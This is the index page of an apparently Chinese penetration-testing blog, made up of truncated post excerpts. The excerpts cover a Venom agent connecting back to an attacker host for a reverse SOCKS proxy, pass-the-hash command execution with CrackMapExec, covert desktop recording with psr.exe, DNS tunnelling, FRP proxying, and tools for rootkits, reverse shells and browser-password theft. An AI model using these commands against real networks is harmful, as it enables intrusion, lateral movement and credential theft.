利用venom反向socks代理
2022年01月05日 No comment目标边界: 12.12.12.12 agent.exe ‐rhost 198.118.119.118 ‐rport 9999
攻击机: 198.118.119.118 ./admin_linux_x86 ‐lport 99990x01 攻击机监听./admin_linux_x86 ‐lport 99990x2 靶机反向连接agent.e
阅读全文 »
brootkit
2021年12月25日 No commenthttps://github.com/cloudsec/brootkit https://blog.csdn.net/whatday/article/details/54298501
阅读全文 »
反弹shell管理工具
2021年12月24日 No commenthttps://github.com/WangYihang/Reverse-Shell-Manager https://github.com/WangYihang/Platypus/releases/ 使用说明https://platypus-reverse-shell.vercel.app/quick-start/
阅读全文 »
DNS隧道工具
2021年12月24日 No commentiodine https://github.com/yarrick/iodine dnscat2 Type:dns解析类型 A CNAME MX TXT 分为直链模式和中继模式 gem install ecdsa gem install salsa20 gem install sha3 gem install trollop https://rubygems.org/gems
阅读全文 »
windows自带的PSR实现监控桌面
2021年12月23日 No commentpsr.exe /start /gui 0 /output C:\temp\capture.zip 开始录制
psr /stop 停止录制输出的文件是 mht 直接ie打开
阅读全文 »
端口转发python脚本
2021年12月23日 No commentlts.py -listen 80 2222lts.py -slave 10.10.10.10:80 10.10.10.10:3389#!/usr/bin/env python
# coding=utf-8
'''
===============
阅读全文 »
Crackmapexec
2021年12月21日 No commentkali下进行安装apt-get install crackmapexecIP:可以是单个ip或者ip段-u:指定用户-H:指定NTLM Hash-d:指定域-x:执行系统命令crackmapexec smb 192.168.30.128 -u administrator -H f1de694efa543bb780da59c049541ea3 -d workgroup.cool -x&n
阅读全文 »
Windows域信息收集提权命令
2021年12月20日 No comment获取Windows 其他信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar 查看WinRAR压缩文件等缓存文件打开方式:WIN+R -> %UserProfile%\Recent
C:\Users\Administrator\Recent //默认位置
dir %APPDATA%\Microsoft\Windows\Recent
dir
阅读全文 »
FRP or reGeorg OR tunna
2021年12月20日 No comment利用Frp反向socks代理流量攻击机: 12.12.12.12 frps.exe ‐c frps.ini 开启监听
目标边界: 27.18.19.98
阅读全文 »
内网抓取密码
2021年12月20日 No comment内网抓取密码https://github.com/QAX-A-Team/BrowserGhost
阅读全文 »